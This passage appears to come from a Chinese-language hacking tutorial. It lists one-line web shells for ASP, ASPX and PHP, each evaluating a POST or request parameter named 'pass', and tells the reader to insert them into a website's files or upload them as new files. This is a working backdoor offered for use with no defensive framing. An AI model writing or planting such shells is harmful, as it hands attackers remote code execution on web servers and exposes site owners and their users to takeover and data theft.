二.实战
(可用)asp的一句话是:
<%eval request ("pass")%>(可用)aspx的一句话是:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>(没试)php的一句话是:
<?php @eval($_POST['pass']);?>我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。